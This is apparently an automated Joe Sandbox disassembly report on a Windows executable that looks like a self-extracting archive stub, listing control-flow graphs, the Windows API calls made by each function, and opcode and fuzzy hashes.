                        • Instruction Fuzzy Hash: 302128712857447BE311FB249C45FAF7B9CEF82718F110619FA50E61D0DBA54A088BAA

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 438 c80870-c80888 call c81bc0 441 c8088e-c8089a call c86e03 438->441 442 c80ad4-c80adc 438->442 441->442 445 c808a0-c808c8 call c82bf0 441->445 448 c808ca 445->448 449 c808d2-c808df 445->449 448->449 450 c808e1 449->450 451 c808e3-c808ec 449->451 450->451 452 c808ee-c808f0 451->452 453 c80924 451->453 454 c808f8-c808fb 452->454 455 c80928-c8092a 453->455 456 c80a88-c80a8d 454->456 457 c80901-c80909 454->457 458 c8092c-c8092f 455->458 459 c80931-c80933 455->459 462 c80a8f 456->462 463 c80a82-c80a86 456->463 464 c8090f-c80915 457->464 465 c80aa1-c80aa9 457->465 458->459 461 c80946-c80958 call c7313c 458->461 460 c80935-c8093c 459->460 459->461 460->461 466 c8093e 460->466 473 c8095a-c80967 call c76fa3 461->473 474 c80971-c8097c call c723ea 461->474 468 c80a94-c80a98 462->468 463->456 463->468 464->465 469 c8091b-c80922 464->469 470 c80aab-c80aad 465->470 471 c80ab1-c80ab9 465->471 466->461 468->465 469->453 469->454 470->471 471->455 473->474 479 c80969 473->479 480 c80999-c809a6 ShellExecuteExW 474->480 481 c8097e-c80995 call c72ec0 474->481 479->474 482 c809ac-c809bf 480->482 483 c80ad2-c80ad3 480->483 481->480 485 c809c1-c809c8 482->485 486 c809d2-c809d4 482->486 483->442 485->486 488 c809ca-c809d0 485->488 489 c809d6-c809df IsWindowVisible 486->489 490 c809e7-c809fa WaitForInputIdle call c80d02 486->490 488->486 491 c80a3d-c80a49 CloseHandle 488->491 489->490 492 c809e1-c809e5 ShowWindow 489->492 494 c809ff-c80a06 490->494 495 c80a5a-c80a68 491->495 496 c80a4b-c80a58 call c76fa3 491->496 492->490 494->491 500 c80a08-c80a10 494->500 498 c80a6a-c80a6c 495->498 499 c80ac5-c80ac7 495->499 496->495 505 c80abe 496->505 498->499 503 c80a6e-c80a74 498->503 499->483 502 c80ac9-c80acb 499->502 500->491 504 c80a12-c80a23 GetExitCodeProcess 500->504 502->483 506 c80acd-c80ad0 ShowWindow 502->506 503->499 507 c80a76-c80a80 503->507 504->491 508 c80a25-c80a2f 504->508 505->499 506->483 507->499 509 c80a31 508->509 510 c80a36 508->510 509->510 510->491
                        APIs
                        • ShellExecuteExW.SHELL32(000001C0), ref: 00C8099E
                        • IsWindowVisible.USER32(?), ref: 00C809D7
                        • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00C809E3
                        • WaitForInputIdle.USER32(?,000007D0), ref: 00C809F0
                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00C80A1B
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C80A41
                        • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00C80AD0
                          • Part of subcall function 00C76FA3: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C72D5B,?,?,?,00C72D0A,?,-00000002,?,00000000,?), ref: 00C76FB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Window$Show$CloseCodeCompareExecuteExitHandleIdleInputProcessShellStringVisibleWait
                        • String ID: $.exe$.inf
                        • API String ID: 1693144567-2452507128
                        • Opcode ID: d87237045e0a1f15960d5dc5110b8605d260294697ce20285e7fc5425fcf79d6
                        • Instruction ID: 7cc4b17279501eecf43f958f77519c9c945ea26bc53532d1a3f5b3899c0d7d4f
                        • Opcode Fuzzy Hash: d87237045e0a1f15960d5dc5110b8605d260294697ce20285e7fc5425fcf79d6
                        • Instruction Fuzzy Hash: BF51B3715053809BE771BF64D844BAFB7E8EF81708F24081DE4E1A7191D7B18A8CE75A

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 950 c73940-c73974 call c81b98 call c81bc0 call c8318e 957 c739a7-c739b0 call c75c1f 950->957 958 c73976-c739a5 GetModuleFileNameW call c735ae call c75bf7 950->958 962 c739b5-c739d9 call c71a0d call c71d7b 957->962 958->962 969 c739df-c739e8 962->969 970 c73c2c-c73c47 call c71a43 962->970 972 c739eb-c739ee 969->972 974 c739f4-c73a26 call c720fb call c71f1d 972->974 975 c73b1c-c73b3c call c71ff0 call c882fb 972->975 985 c73ae5-c73ae8 974->985 986 c73a2c-c73a34 974->986 975->970 984 c73b42-c73b5b call c71f1d 975->984 998 c73b64-c73b76 call c882fb 984->998 999 c73b5d-c73b62 984->999 990 c73aeb-c73b0d call c71ff0 985->990 988 c73a36-c73a3e 986->988 989 c73a5f-c73a6a 986->989 988->989 992 c73a40-c73a5a call c88310 988->992 993 c73a95-c73a9d 989->993 994 c73a6c-c73a78 989->994 990->972 1009 c73b13-c73b16 990->1009 1014 c73a5c 992->1014 1015 c73adb-c73ae3 992->1015 996 c73a9f-c73aa7 993->996 997 c73ac9-c73acd 993->997 994->993 1001 c73a7a-c73a7f 994->1001 996->997 1003 c73aa9-c73ac3 call c88310 996->1003 997->985 1004 c73acf-c73ad2 997->1004 998->970 1020 c73b7c-c73b99 call c76b87 call c86e1e 998->1020 1005 c73b9b-c73ba3 999->1005 1001->993 1008 c73a81-c73a93 call c881ec 1001->1008 1003->970 1003->997 1004->986 1010 c73ba5 1005->1010 1011 c73ba8-c73bb5 1005->1011 1008->993 1022 c73ad7 1008->1022 1009->970 1009->975 1010->1011 1017 c73bb7-c73bb9 1011->1017 1018 c73c21-c73c29 1011->1018 1014->989 1015->990 1023 c73bba-c73bc4 1017->1023 1018->970 1020->1005 1022->1015 1023->1018 1025 c73bc6-c73bca 1023->1025 1027 c73c04-c73c07 1025->1027 1028 c73bcc-c73bd3 1025->1028 1030 c73c11-c73c13 1027->1030 1031 c73c09-c73c0f 1027->1031 1032 c73bd5-c73bd8 1028->1032 1033 c73bfa 1028->1033 1035 c73c14 1030->1035 1031->1030 1031->1035 1036 c73bf6-c73bf8 1032->1036 1037 c73bda-c73bdd 1032->1037 1038 c73bfc-c73c02 1033->1038 1039 c73c18-c73c1f 1035->1039 1036->1038 1040 c73bf2-c73bf4 1037->1040 1041 c73bdf-c73be2 1037->1041 1038->1039 1039->1018 1039->1023 1040->1038 1042 c73be4-c73be8 1041->1042 1043 c73bee-c73bf0 1041->1043 1042->1035 1044 c73bea-c73bec 1042->1044 1043->1038 1044->1038
                        APIs
                        • __EH_prolog.LIBCMT ref: 00C73945
                        • _wcschr.LIBVCRUNTIME ref: 00C73963
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00C73927,?), ref: 00C7397E
                          • Part of subcall function 00C76B87: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C73269,00000000,?,?), ref: 00C76BA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                        • String ID: *messages***$*messages***$R$a
                        • API String ID: 803915177-2900423073
                        • Opcode ID: 421443c80b64b45b5b085880850757d4e140d055eede7f72f5a15eadd6fc1a93
                        • Instruction ID: ecfab4ddbcd58441c2d7e247aefaea85c6b4270310f406eef7ee1a8e5934f5a8
                        • Opcode Fuzzy Hash: 421443c80b64b45b5b085880850757d4e140d055eede7f72f5a15eadd6fc1a93
                        • Instruction Fuzzy Hash: FF9148B1A002859BDB30EFA8CC46BAE77B4EF44310F10C569E69DA7191DB709B84EB54

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1045 c7ff9f-c7ffa2 1046 c80123-c80126 1045->1046 1047 c7ffa8-c7ffcd GetTempPathW call c72e95 1045->1047 1049 c8012c-c80133 1046->1049 1050 c804d7-c80502 call c7e5b0 1046->1050 1056 c7ffd1-c7fffd call c736d0 call c723ea 1047->1056 1053 c8013f-c80146 1049->1053 1054 c80135 1049->1054 1057 c80508-c80518 1050->1057 1058 c7f95f-c7f96d 1050->1058 1053->1050 1054->1053 1068 c7ffcf-c7ffd0 1056->1068 1069 c7ffff-c80017 SetDlgItemTextW 1056->1069 1060 c7f96e-c7f97e call c7e22e 1058->1060 1067 c7f980 1060->1067 1070 c7f982-c7f997 call c76fa3 1067->1070 1068->1056 1069->1050 1071 c8001d-c80024 1069->1071 1076 c7f9a4-c7f9a7 1070->1076 1077 c7f999-c7f99d 1070->1077 1071->1050 1073 c8002a-c80045 call c8318e 1071->1073 1081 c80099-c800a1 1073->1081 1082 c80047-c80052 1073->1082 1076->1050 1080 c7f9ad 1076->1080 1077->1070 1079 c7f99f 1077->1079 1079->1050 1086 c7f9b4-c7f9b7 1080->1086 1087 c7fc44-c7fc46 1080->1087 1088 c7fba3-c7fba5 1080->1088 1089 c7fc61-c7fc63 1080->1089 1084 c800d3-c80103 call c7e059 call c7dc01 1081->1084 1085 c800a3-c800ce call c75c1f * 2 1081->1085 1082->1081 1083 c80054-c80056 1082->1083 1092 c8005c-c80060 1083->1092 1084->1050 1122 c80109-c8011d EndDialog 1084->1122 1085->1084 1086->1050 1090 c7f9bd-c7fa2a call c7dac4 call c734cc call c72716 call c72850 call c72290 call c727a3 1086->1090 1087->1050 1096 c7fc4c-c7fc5c SetWindowTextW 1087->1096 1088->1050 1093 c7fbab-c7fbb7 1088->1093 1089->1050 1091 c7fc69-c7fc70 1089->1091 1175 c7fa30-c7fa36 1090->1175 1176 c7fb8f-c7fb9e call c7272c 1090->1176 1091->1050 1098 c7fc76-c7fc8f 1091->1098 1099 c80062-c80071 1092->1099 1100 c80075-c80091 call c75c1f 1092->1100 1101 c7fbcb-c7fbd0 1093->1101 1102 c7fbb9-c7fbca call c894c4 1093->1102 1096->1050 1106 c7fc97-c7fca5 call c86e03 1098->1106 1107 c7fc91 1098->1107 1099->1092 1108 c80073 1099->1108 1100->1081 1111 c7fbd2-c7fbd8 1101->1111 1112 c7fbda-c7fbe5 call c7e708 1101->1112 1102->1101 1106->1050 1130 c7fcab-c7fcb4 1106->1130 1107->1106 1108->1081 1120 c7fbea-c7fbec 1111->1120 1112->1120 1126 c7fbf7-c7fc17 call c86e03 call c883b5 1120->1126 1127 c7fbee-c7fbf5 call c86e03 1120->1127 1122->1046 1148 c7fc30-c7fc32 1126->1148 1149 c7fc19-c7fc20 1126->1149 1127->1126 1134 c7fcb6-c7fcba 1130->1134 1135 c7fcdd-c7fce0 1130->1135 1134->1135 1139 c7fcbc-c7fcc4 1134->1139 1140 c7fce6-c7fce9 1135->1140 1141 c7fdc5-c7fdd3 call c75c1f 1135->1141 1139->1050 1145 c7fcca-c7fcd8 call c75c1f 1139->1145 1146 c7fcf6-c7fd11 1140->1146 1147 c7fceb-c7fcf0 1140->1147 1158 c7fdd5-c7fde9 call c8336b 1141->1158 1145->1158 1160 c7fd13-c7fd4d 1146->1160 1161 c7fd5b-c7fd62 1146->1161 1147->1141 1147->1146 1148->1050 1156 c7fc38-c7fc3f call c86e1e 1148->1156 1154 c7fc27-c7fc2f call c894c4 1149->1154 1155 c7fc22-c7fc24 1149->1155 1154->1148 1155->1154 1156->1050 1177 c7fdf6-c7fe52 call c75c1f call c7e456 GetDlgItem SetWindowTextW SendMessageW call c88169 1158->1177 1178 c7fdeb-c7fdef 1158->1178 1197 c7fd51-c7fd53 1160->1197 1198 c7fd4f 1160->1198 1167 c7fd64-c7fd7c call c86e03 1161->1167 1168 c7fd90-c7fdb3 call c86e03 * 2 1161->1168 1167->1168 1191 c7fd7e-c7fd8b call c75bf7 1167->1191 1168->1158 1203 c7fdb5-c7fdc3 call c75bf7 1168->1203 1182 c7fa3d-c7fa52 SetFileAttributesW 1175->1182 1176->1050 1177->1050 1216 c7fe58-c7fe6a SendMessageW 1177->1216 1178->1177 1183 c7fdf1-c7fdf3 1178->1183 1185 c7faf8-c7fb04 GetFileAttributesW 1182->1185 1186 c7fa58-c7fa8b call c731a0 call c72e95 call c86e03 1182->1186 1183->1177 1194 c7fb06-c7fb15 DeleteFileW 1185->1194 1195 c7fb74-c7fb89 call c727a3 1185->1195 1221 c7fa9e-c7faac call c7348c 1186->1221 1222 c7fa8d-c7fa9c call c86e03 1186->1222 1191->1168 1194->1195 1202 c7fb17-c7fb1a 1194->1202 1195->1176 1214 c7fa38 1195->1214 1197->1161 1198->1197 1207 c7fb1e-c7fb4a call c736d0 GetFileAttributesW 1202->1207 1203->1158 1219 c7fb1c-c7fb1d 1207->1219 1220 c7fb4c-c7fb62 MoveFileW 1207->1220 1214->1182 1216->1050 1219->1207 1220->1195 1223 c7fb64-c7fb6e MoveFileExW 1220->1223 1221->1176 1228 c7fab2-c7faf2 call c86e03 call c82bf0 SHFileOperationW 1221->1228 1222->1221 1222->1228 1223->1195 1228->1185
                        APIs
                        • GetTempPathW.KERNELBASE(00000800,?), ref: 00C7FFB5
                        • _swprintf.LIBCMT ref: 00C7FFE9
                          • Part of subcall function 00C736D0: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C736E3
                        • SetDlgItemTextW.USER32(?,00000066,00CB9732), ref: 00C80009
                        • _wcschr.LIBVCRUNTIME ref: 00C8003C
                        • EndDialog.USER32(?,00000001), ref: 00C8011D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                        • String ID: %s%s%u
                        • API String ID: 2892007947-1360425832
                        • Opcode ID: 2d6a2ad6392e1505cde758a1eaf233a4002f27e3f2ab25570059e3bd6480ea81
                        • Instruction ID: 8fe5a0c633280e92e28b6fac506521bb9d0b7db3d3f3b6c0f331063865dabf9e
                        • Opcode Fuzzy Hash: 2d6a2ad6392e1505cde758a1eaf233a4002f27e3f2ab25570059e3bd6480ea81
                        • Instruction Fuzzy Hash: A3416271900218AEEF65EB60DC85FEE77BCEB04305F1080A6F609E6051EF749B899F60

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1233 c8c21a-c8c233 1234 c8c249-c8c24e 1233->1234 1235 c8c235-c8c245 call c9082d 1233->1235 1237 c8c25b-c8c27f MultiByteToWideChar 1234->1237 1238 c8c250-c8c258 1234->1238 1235->1234 1242 c8c247 1235->1242 1240 c8c412-c8c425 call c82495 1237->1240 1241 c8c285-c8c291 1237->1241 1238->1237 1243 c8c293-c8c2a4 1241->1243 1244 c8c2e5 1241->1244 1242->1234 1247 c8c2c3-c8c2d4 call c8a838 1243->1247 1248 c8c2a6-c8c2b5 call c94000 1243->1248 1246 c8c2e7-c8c2e9 1244->1246 1251 c8c2ef-c8c302 MultiByteToWideChar 1246->1251 1252 c8c407 1246->1252 1247->1252 1258 c8c2da 1247->1258 1248->1252 1261 c8c2bb-c8c2c1 1248->1261 1251->1252 1255 c8c308-c8c31a call c8c875 1251->1255 1256 c8c409-c8c410 call c8c482 1252->1256 1263 c8c31f-c8c323 1255->1263 1256->1240 1262 c8c2e0-c8c2e3 1258->1262 1261->1262 1262->1246 1263->1252 1265 c8c329-c8c330 1263->1265 1266 c8c36a-c8c376 1265->1266 1267 c8c332-c8c337 1265->1267 1268 c8c378-c8c389 1266->1268 1269 c8c3c2 1266->1269 1267->1256 1270 c8c33d-c8c33f 1267->1270 1271 c8c38b-c8c39a call c94000 1268->1271 1272 c8c3a4-c8c3b5 call c8a838 1268->1272 1273 c8c3c4-c8c3c6 1269->1273 1270->1252 1274 c8c345-c8c35f call c8c875 1270->1274 1278 c8c400-c8c406 call c8c482 1271->1278 1287 c8c39c-c8c3a2 1271->1287 1272->1278 1289 c8c3b7 1272->1289 1277 c8c3c8-c8c3e1 call c8c875 1273->1277 1273->1278 1274->1256 1286 c8c365 1274->1286 1277->1278 1290 c8c3e3-c8c3ea 1277->1290 1278->1252 1286->1252 1291 c8c3bd-c8c3c0 1287->1291 1289->1291 1292 c8c3ec-c8c3ed 1290->1292 1293 c8c426-c8c42c 1290->1293 1291->1273 1294 c8c3ee-c8c3fe WideCharToMultiByte 1292->1294 1293->1294 1294->1278 1295 c8c42e-c8c435 call c8c482 1294->1295 1295->1256
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C87C2A,00C87C2A,?,?,?,00C8C46B,00000001,00000001,91E85006), ref: 00C8C274
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C8C46B,00000001,00000001,91E85006,?,?,?), ref: 00C8C2FA
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,91E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C8C3F4
                        • __freea.LIBCMT ref: 00C8C401
                          • Part of subcall function 00C8A838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A
                        • __freea.LIBCMT ref: 00C8C40A
                        • __freea.LIBCMT ref: 00C8C42F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                        • String ID:
                        • API String ID: 1414292761-0
                        • Opcode ID: 75e90c1623ff396cf5c63c9d74563399f9e84672e7323fd0f523228bbf0e0938
                        • Instruction ID: 89aa5f7f68d07b60c2b13c63d4ac4a84ec9933e3de35a2d4a898d35b313d6cfa
                        • Opcode Fuzzy Hash: 75e90c1623ff396cf5c63c9d74563399f9e84672e7323fd0f523228bbf0e0938
                        • Instruction Fuzzy Hash: 3851F172600216ABDB25AE64CCD1FBF37A9EB84758F244229FC14D6190EB34DD81D7B8

                        Control-flow Graph

                        APIs
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C76551
                          • Part of subcall function 00C729F2: GetVersionExW.KERNEL32(?), ref: 00C72A17
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C76573
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7658D
                        • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00C7659E
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C765AE
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C765BA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Time$File$System$Local$SpecificVersion
                        • String ID:
                        • API String ID: 2092733347-0
                        • Opcode ID: d2126592b2e7ac35a7d115d8adf7d3897d3eb109d618362efa905b6771d00511
                        • Instruction ID: abc3cd19e4376491543e07d6837f557554cc6b4a7f87191cf8c0848fb67ef9ba
                        • Opcode Fuzzy Hash: d2126592b2e7ac35a7d115d8adf7d3897d3eb109d618362efa905b6771d00511
                        • Instruction Fuzzy Hash: A431D37A1083459FC740DFA9D8849ABB7E8FF98704F44991EF999C3210EB30D549CB6A

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1309 c7defe-c7df1d GetClassNameW 1310 c7df45-c7df47 1309->1310 1311 c7df1f-c7df34 call c76fa3 1309->1311 1313 c7df52-c7df56 1310->1313 1314 c7df49-c7df4b 1310->1314 1316 c7df36-c7df42 FindWindowExW 1311->1316 1317 c7df44 1311->1317 1314->1313 1316->1317 1317->1310
                        APIs
                        • GetClassNameW.USER32(?,?,00000050), ref: 00C7DF15
                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 00C7DF4C
                          • Part of subcall function 00C76FA3: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C72D5B,?,?,?,00C72D0A,?,-00000002,?,00000000,?), ref: 00C76FB9
                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00C7DF3C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                        • String ID: @Ut$EDIT
                        • API String ID: 4243998846-2065656831
                        • Opcode ID: 05f88effb88fc33c9f6959e1a7794d62165ffa4a1f2402e7cfc6a4aabd8f31b2
                        • Instruction ID: aaf8d2022c6a6425b11b4622df7fafe877838b553ab7330223cf5d2ef699031e
                        • Opcode Fuzzy Hash: 05f88effb88fc33c9f6959e1a7794d62165ffa4a1f2402e7cfc6a4aabd8f31b2
                        • Instruction Fuzzy Hash: 87F0AE3260561877DB30A6549C0DF9F777C9F46B01F454166FD05F2180D7A0DD0685F9

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00C75E92: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C75EAD
                          • Part of subcall function 00C75E92: LoadLibraryW.KERNELBASE(?,?,00C74C54,Crypt32.dll,?,00C74CD6,?,00C74CBA,?,?,?,?), ref: 00C75ECF
                        • OleInitialize.OLE32(00000000), ref: 00C7DF85
                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7DFBC
                        • SHGetMalloc.SHELL32(00CB86E0), ref: 00C7DFC6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                        • String ID: riched20.dll$3So
                        • API String ID: 3498096277-3464455743
                        • Opcode ID: 11bd4bd88d8e7650a7664c6bcc5d93d99eec0d8001152d911d16019ac6419fae
                        • Instruction ID: 1fb4dd3413e89ffb56e7ff792e2e43b5bda5751d63c4885d9c03f1d7b9e0a734
                        • Opcode Fuzzy Hash: 11bd4bd88d8e7650a7664c6bcc5d93d99eec0d8001152d911d16019ac6419fae
                        • Instruction Fuzzy Hash: FEF012B1D00109ABCB10AFA9D849AEFFFFCEF94711F00416BE814E2251DBB556069FA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1350 c80ca3-c80cce call c81bc0 SetEnvironmentVariableW call c759d0 1354 c80cd3-c80cd7 1350->1354 1355 c80cd9-c80cdd 1354->1355 1356 c80cfb-c80cff 1354->1356 1357 c80ce6-c80ced call c75ac7 1355->1357 1360 c80cdf-c80ce5 1357->1360 1361 c80cef-c80cf5 SetEnvironmentVariableW 1357->1361 1360->1357 1361->1356
                        APIs
                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C80CB9
                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C80CF5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: EnvironmentVariable
                        • String ID: sfxcmd$sfxpar
                        • API String ID: 1431749950-3493335439
                        • Opcode ID: c7ec5a02f615fb483e477089eb3e0119ae0297f9967db87f65293360fe93669f
                        • Instruction ID: c6338a185a13a392591164420f3d4c4465dd9936c82b3540cbaccf33f64127b3
                        • Opcode Fuzzy Hash: c7ec5a02f615fb483e477089eb3e0119ae0297f9967db87f65293360fe93669f
